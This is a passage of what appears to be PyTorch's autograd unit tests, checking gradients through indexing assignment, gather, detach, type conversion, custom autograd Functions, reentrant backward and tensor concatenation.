y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
    """Helper: setitem with a grad-requiring value routes gradient to both
    the target (zeroed at `index`) and the assigned value (ones)."""
    x = torch.ones(*size, requires_grad=True)
    y = x + 2
    y_version = y._version
    value = x.new(x[index].size()).fill_(7)
    value.requires_grad = True
    y[index] = value
    # in-place assignment must bump y's version counter
    self.assertNotEqual(y._version, y_version)
    y.backward(torch.ones(*size))
    expected_grad_input = torch.ones(*size)
    # overwritten positions contribute no gradient to x
    expected_grad_input[index] = 0
    self.assertEqual(x.grad, expected_grad_input)
    self.assertEqual(value.grad, torch.ones_like(value))
    # case when x broadcasts to as y[1]
    x = torch.randn(4, requires_grad=True)
    y = torch.zeros(2, 3, 4)
    y[1] = x
    y.backward(torch.randn(2, 3, 4))
    # broadcasting in forward must reduce back to x's shape in backward
    self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
    """Drive the setitem helpers over scalar, list, slice, and tensor indices."""
    # constant-value assignment across index kinds
    self._test_setitem((5, 5), 1)
    self._test_setitem((5,), 1)
    self._test_setitem((1,), 0)
    self._test_setitem((10,), [[0, 4, 2]])
    self._test_setitem((5, 5), [[0, 4], [2, 2]])
    self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    # grad-requiring tensor-value assignment across index kinds
    self._test_setitem_tensor((5, 5), 3)
    self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
    self._test_setitem_tensor((5,), 3)
    self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
    self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
                              3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
    """Exercise gradient-through-setitem with boolean masks of several shapes."""
    mask = torch.BoolTensor(5, 5).bernoulli_()
    self._test_setitem((5, 5), Variable(mask))
    self._test_setitem((5,), Variable(mask[0]))
    self._test_setitem((1,), Variable(mask[0, 0:1]))
    self._test_setitem_tensor((5, 5), Variable(mask))
    self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
    """fill_ on a clone is differentiable w.r.t. the root (zero gradient)."""
    root = torch.randn(4, 5, requires_grad=True)

    def fill_two(t):
        clone = t.clone()
        clone.fill_(2)
        return clone

    gradcheck(fill_two, [root])
    gradgradcheck(fill_two, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
    """Sparse vs. dense gather gradient along dim 0."""
    self._test_sparse_gather(size_x=(10, 10), size_ind=(5, 10), dim=0)
def test_sparse_gather_dim1(self):
    """Sparse vs. dense gather gradient along dim 1."""
    self._test_sparse_gather(size_x=(10, 10, 5), size_ind=(10, 5, 5), dim=1)
def test_sparse_gather_dim_neg(self):
    """Sparse vs. dense gather gradient along a negative dim."""
    self._test_sparse_gather(size_x=(10, 10, 5), size_ind=(10, 10, 2), dim=-1)
def test_sparse_gather_ind_scalar(self):
    """Sparse vs. dense gather gradient with a scalar index tensor."""
    self._test_sparse_gather(size_x=(10,), size_ind=(), dim=0)
def test_sparse_gather_x_scalar(self):
    """Sparse vs. dense gather gradient with a scalar source tensor."""
    self._test_sparse_gather(size_x=(), size_ind=(2,), dim=0)
def test_sparse_gather_both_scalar(self):
    """Sparse vs. dense gather gradient with scalar source and index."""
    self._test_sparse_gather(size_x=(), size_ind=(), dim=0)
def test_gc_in_destructor(self):
    """
    Previously, if a Function destructor triggered a garbage collection,
    the Variable's tp_dealloc handler would get called twice leading to a
    segfault.
    """
    class CollectOnDelete(Function):
        def forward(self, x):
            return x

        def backward(self, grad_output):
            return grad_output

        def __del__(self):
            # force a GC cycle while the Function is being torn down
            gc.collect()

    # repeat to give the double-dealloc a chance to manifest
    for _ in range(10):
        CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
    """Accessing grad_fn-only attributes on a bare Function instance must
    raise cleanly instead of segfaulting."""
    class Id(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, grad_x):
            return grad_x

    with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
        f = Id()
    # # After raising warning, should still return an instance
    self.assertIsInstance(f, Id)
    x = torch.zeros(1, requires_grad=True)
    with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
        f(x)
    t = Id.apply(x)
    self.assertEqual(t.grad_fn.name(), "IdBackward")
    # THPFunction is the base class of both grad_fn and autograd functions,
    # which means that a lot of accessors on them may segfault. Test that we
    # properly error in this case.
    t = torch.ones(1, requires_grad=True)
    t._backward_hooks = dict()
    with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
        f._register_hook_dict(t)
    with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
        f.register_hook(lambda x, y: None)
    with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
        f.next_functions
    with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
        f.name()
    with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
        f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
    """Known bug: grad_fn.metadata should survive the output being deleted."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, g):
            return g

    x = torch.zeros(1, requires_grad=True)
    y = MyFunction.apply(x)
    y.backward()
    y.grad_fn.metadata
    g = y.grad_fn
    del y
    g.metadata  # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
    """A ctx stashed past backward must refuse saved_tensors once freed."""
    saved_ctx = []

    class Id(Function):
        @staticmethod
        def forward(ctx, x):
            ctx.save_for_backward(x)
            return x

        @staticmethod
        def backward(ctx, grad_x):
            # leak the ctx out of backward on purpose
            saved_ctx.append(ctx)
            return ctx.saved_tensors

    p = torch.zeros(1, requires_grad=True)
    loss = Id.apply(p)
    loss.backward(retain_graph=True)
    del loss
    # At this point in time, it complains that the graph has been freed
    # (which indeed true, although a somewhat indirect way of stating the
    # problem).
    self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
    """Repeated grad-of-grad through a custom Function must be deterministic."""
    # This test failed the equality check in PR #22983; it's an interesting
    # and different test case worth enshrining. mult1 is not testing
    # anything that interesting, but mult2 is the interesting case.
    def mult1(x):
        return x.prod(dim=-1).prod(dim=-1)

    class Mult(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = mult1(x)
            ctx.save_for_backward(x, y)
            return y

        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            # d(prod)/dx_i = prod / x_i
            return (grad_output * y)[:, None, None] / x

    mult2 = Mult.apply

    def check_gradgrad_repeated(x, y):
        # run the same double-backward twice; results must agree
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])

    x = torch.ones(2, 4, 4).requires_grad_()
    check_gradgrad_repeated(x, mult1(x))
    check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
    """Saved buffers of a custom Function must not be freed prematurely."""
    # This test failed complaining that buffers had already been freed
    # prior to #22983. Also pretty interesting test case.
    class Double(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = x ** 2
            ctx.save_for_backward(x, y)
            return y

        @staticmethod
        def backward(ctx, grad_output):
            x, _ = ctx.saved_tensors
            return grad_output * 2 * x

    # this is equivalent, but uses the output of .forward() in .backward()
    class Double2(Double):
        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            return grad_output * 2 * y / x

    double = Double.apply
    double2 = Double2.apply
    x = torch.tensor(2).double().requires_grad_()
    self.assertTrue(gradcheck(double, x))
    self.assertTrue(gradgradcheck(double, x))
    self.assertTrue(gradcheck(double2, x))
    self.assertTrue(gradgradcheck(double2, x))
    y = double(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)
    y = double2(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)  # should not error!
def test_detach(self):
    """detach()/detach_() cut the graph; detaching a view in place is rejected."""
    x = torch.randn(10, 10, requires_grad=True)
    y = x + 2
    y = y.detach()
    z = y * 4 + 2
    self.assertFalse(y.requires_grad)
    self.assertFalse(z.requires_grad)
    x = torch.randn(10, 10, requires_grad=True)
    y = x * 2
    y = y.detach()
    self.assertFalse(y.requires_grad)
    self.assertIsNone(y.grad_fn)
    z = x + y
    z.sum().backward()
    # This is an incorrect gradient, but we assume that's what the user
    # wanted. detach() is an advanced option.
    self.assertEqual(x.grad, torch.ones(10, 10))
    # in-place detach
    x = torch.randn(10, 10, requires_grad=True)
    y = torch.randn(10, 10, requires_grad=True)
    a = x * 2
    (y + a).sum().backward(retain_graph=True)
    a.detach_()
    self.assertFalse(a.requires_grad)
    (y + a).sum().backward()  # this won't backprop to x
    self.assertEqual(x.grad, torch.ones(10, 10) * 2)
    self.assertEqual(y.grad, torch.ones(10, 10) * 2)
    # in-place detach on a view raises an exception
    view = x.narrow(0, 1, 4)
    self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
    """Helper: backward through dtype conversion keeps the leaf's tensor type.

    `t` maps a CPU tensor onto the device/type under test (identity or .cuda()).
    """
    fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
    fvar.double().sum().backward()
    self.assertEqual(fvar.grad, torch.ones_like(fvar))
    # the gradient must live on the same tensor type as the leaf
    self.assertEqual(type(fvar.grad), type(fvar))
    dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
    dvar.float().sum().backward()
    self.assertEqual(dvar.grad, torch.ones_like(dvar))
    self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
    """Tensor type/device conversions: isinstance, device placement, data
    sharing, and backward through conversions (CUDA parts are conditional)."""
    x = torch.randn(5, 5)
    self.assertIsInstance(x.float(), torch.FloatTensor)
    self.assertIsInstance(x.int(), torch.IntTensor)
    if torch.cuda.is_available():
        self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
        self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
        self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
        if torch.cuda.device_count() >= 2:
            x2 = x.float().cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            x2 = x.float().cuda()
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 0)
            x2 = x2.cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            y = Variable(torch.randn(5).cuda(1), requires_grad=True)
            y.cpu().sum().backward()
            # gradient comes back on the leaf's original device
            self.assertIs(y.grad.get_device(), 1)
            self.assertIs(y.long().get_device(), 1)
    for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
        for y_var in (True, False):
            y = torch.randint(5, (5, 5), dtype=t.dtype)
            y = Variable(y) if y_var else y
            self.assertIsInstance(x.type(t), t)
            self.assertIsInstance(x.type_as(y), t)
            # TODO: t.dtype should work
            t_dtype = t().dtype
            self.assertIsInstance(x.type(t_dtype), t)
            self.assertIs(t_dtype, x.type(t_dtype).dtype)
            # converting to the same type must not copy storage
            self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
            if torch.cuda.is_available():
                for x_cuda in (True, False):
                    for y_cuda in (True, False):
                        x_c = x.cuda() if x_cuda else x
                        y_c = y.cuda() if y_cuda else y
                        _, y_type = y_c.type().rsplit('.', 1)
                        y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
                        self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
                        self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
                        self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())

    self._test_type_conversion_backward(lambda x: x)
    if torch.cuda.is_available():
        self._test_type_conversion_backward(lambda x: x.cuda())
        if torch.cuda.device_count() >= 2:
            # one of these has to be the non-default device
            self._test_type_conversion_backward(lambda x: x.cuda(0))
            self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
    """A Function returning one of its inputs: hooks on that output see only
    gradient from uses of the output, not from direct uses of the leaf."""
    class Identity(Function):
        @staticmethod
        def forward(ctx, a, b):
            return a, a + b

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a + grad_b, grad_b

    hook_called = [False]
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)
    q, p = Identity.apply(x, y)
    # Make sure hooks only receive grad from usage of q, not x.
    def hook(grad):
        hook_called[0] = True
        self.assertEqual(grad, torch.ones(5, 5))

    q.register_hook(hook)
    (q + p + x).sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5) * 3)
    self.assertEqual(y.grad, torch.ones(5, 5))
    self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
    """Returning an in-place-modified (dirty) input attaches a grad_fn to it."""
    class Inplace(InplaceFunction):
        @staticmethod
        def forward(ctx, a, b):
            ctx.mark_dirty(a)
            return a.add_(b), b + 2

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a, grad_a + grad_b

    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)
    q, p = Inplace.apply(x, y)
    # the dirty output is the very same tensor object as the input
    self.assertIs(q, x)
    self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
    self.assertTrue(q.requires_grad)
    q.sum().backward()
    self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
    """Engine regression test: buffered gradients must be cloned before the
    same tensor is accumulated into from multiple places."""
    # This tests checks backward engine for a very subtle bug that appeared
    # in one of the initial versions of autograd. Gradients tensors were
    # simply stored in lists while the function waited for all its gradients
    # to be computed. However, sometimes an output was used multiple times,
    # so the gradients needed to be summed. Engine used to keep a need_copy
    # set of tensors that will need a clone upon next addition and removed
    # them from the set as soon as the clone was performed. However, this
    # could lead to incorrect results if the same gradient tensor was
    # buffered in three places in the graph:
    # 1. When accumulating gradients in one of these places it was cloned
    #    and removed from need_copy set.
    # 2. When accumulating in second place, it wasn't in the need_copy set,
    #    so the gradients were simply accumulated in-place (which already
    #    modified the grad in 3rd place)
    # 3. When accumulating in the third place, it wasn't in the need_copy set
    #    as well, so the incoming gradient was summed in-place, yielding
    #    incorrect results in all functions, except the first one.
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5, requires_grad=True)
    # Simulate that we're in the middle of the graph
    a = x + 2
    b = y + 2
    c = x + 2
    # This op will just return grad_output two times in backward
    add1 = a + b
    add2 = add1 + c
    # Simulate a long branch, so grad_output will get buffered.
    for _ in range(4):
        a = a * 2
        b = b * 2
        c = c * 2
    branch = a + b + c
    out = add2 + branch
    # expected gradients are:
    # for x: 34 (16 from final a, 16 from final c, 2 from add2)
    # for y: 17 (16 from final b, 1 from add2)
    grad_output = torch.ones(5, 5)
    out.backward(grad_output)
    self.assertEqual(x.grad, torch.ones(5, 5) * 34)
    self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
    """A non-differentiable side output can feed another Function without
    breaking the gradient path of the differentiable output."""
    class F1(Function):
        @staticmethod
        def forward(ctx, input):
            out = torch.randn(input.size())
            ctx.mark_non_differentiable(out)
            return input, out

        @staticmethod
        def backward(ctx, grad_output, ignored):
            return grad_output

    class F2(Function):
        @staticmethod
        def forward(ctx, input, ignored):
            return input

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, None

    x = torch.randn(5, requires_grad=True)
    a, b = F1.apply(x)
    b = b + 1  # separate F1 from F2 by another op
    self.assertTrue(a.requires_grad)
    self.assertFalse(b.requires_grad)
    c = F2.apply(a, b)
    c.backward(torch.ones(c.size()))
    self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
    """A custom Function that calls backward() inside its own backward.

    forward() builds a small differentiable graph under enable_grad()
    and returns a detached output; backward() re-enters the autograd
    engine on that inner graph, so d(out)/dx == y_data.
    """
    y_data = torch.randn(2, 2)

    class Reenter(Function):
        @staticmethod
        def forward(ctx, x):
            with torch.enable_grad():
                # Keep differentiable copies on ctx so backward can reuse them.
                ctx.x = Variable(x, requires_grad=True)
                ctx.y = Variable(y_data, requires_grad=True)
                ctx.output_var = ctx.x * ctx.y
            return ctx.output_var.detach()

        @staticmethod
        def backward(ctx, grad_output):
            with torch.enable_grad():
                # Reentrant call into the engine.
                ctx.output_var.sum().backward()
            return ctx.x.grad * grad_output

    # Reentrant starts on CPU thread, finishes on GPU thread
    x = torch.randn(2, 2, requires_grad=True)
    out = Reenter.apply(x)
    out.sum().backward()
    self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
    """An error raised in a reentrant (child) backward must propagate out
    of the parent backward call."""
    # Parent graph.
    a = torch.rand(3, 3, requires_grad=True)
    c = a * a

    # Reentrant child graph.
    b = torch.rand(3, 3, requires_grad=True)
    e = b * b
    f = TestAutograd.SimulateBackwardError.apply(e)
    reentrant_root = f.sum()

    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will throw an error.
            reentrant_root.backward()
            return grad

    d = ReentrantFunc.apply(c)
    with self.assertRaisesRegex(Exception, 'Simulate error'):
        d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
    """gradcheck/gradgradcheck torch.broadcast_tensors over mixed shapes."""
    shapes = [(3,), (1, 2, 1), (1, 1), (5, 1, 1)]
    f_args_variable = tuple(
        torch.randn(*shape, dtype=torch.double, requires_grad=True)
        for shape in shapes
    )
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_broadcast_tensors", "broadcast",
                          lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
                          True, f_args_variable, f_args_tensor)
def test_block_diag(self):
    """gradcheck/gradgradcheck torch.block_diag on three 2-D inputs."""
    f_args_variable = tuple(
        torch.randn(rows, S, dtype=torch.double, requires_grad=True)
        for rows in (1, 2, 3)
    )
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_block_diag", "block_diag",
                          lambda a, b, c: torch.block_diag(a, b, c),
                          True, f_args_variable, f_args_tensor)
def test_cat(self):
    """gradcheck torch.cat along dim 0, forward-AD included."""
    tensors = tuple(
        torch.randn(n, S, S, dtype=torch.double, requires_grad=True)
        for n in (1, 2, 3)
    )
    f_args_variable = tensors + (0,)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
    """gradcheck torch.cat along the last (negative) dimension."""
    tensors = tuple(
        torch.randn(S, S, n, dtype=torch.double, requires_grad=True)
        for n in (1, 2, 3)
    )
    f_args_variable = tensors + (-1,)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_negdim_1", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
    """gradcheck torch.cat along dim -2."""
    tensors = tuple(
        torch.randn(S, n, S, dtype=torch.double, requires_grad=True)
        for n in (1, 2, 3)
    )
    f_args_variable = tensors + (-2,)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_negdim_2", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
    """torch.cat with a 0-element legacy-shaped input.

    gradgradcheck doesn't work, probably because legacy size tracking is
    wrong somewhere, hence False is passed below, but gradcheck is run
    explicitly.
    """
    empty = torch.randn(0, dtype=torch.double, requires_grad=True)
    full = torch.randn(S, S, dtype=torch.double, requires_grad=True)
    f_args_variable = (empty, full)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_empty_legacy", "cat",
                          lambda a, b: torch.cat((a, b)),
                          False, f_args_variable, f_args_tensor, check_forward_ad=True)
    self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable,
                              eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
    """torch.cat with a (0, S) empty input participates in autograd."""
    empty = torch.randn(0, S, dtype=torch.double, requires_grad=True)
    full = torch.randn(S, S, dtype=torch.double, requires_grad=True)
    f_args_variable = (empty, full)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_empty", "cat",
                          lambda a, b: torch.cat((a, b)),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_trapz(self):
    """gradcheck torch.trapz with explicit, non-uniform sample points."""
    y = torch.randn(2, 3, dtype=torch.double, requires_grad=True)
    x = torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]],
                     dtype=torch.double, requires_grad=True)
    f_args_variable = (y, x)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_trapz", "trapz",
                          lambda y, x: torch.trapz(y, x),
                          True, f_args_variable, f_args_tensor)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
    """Autograd checks for torch.lobpcg: gradcheck/gradgradcheck plus
    symmetry of A.grad, over batched and unbatched PSD inputs."""

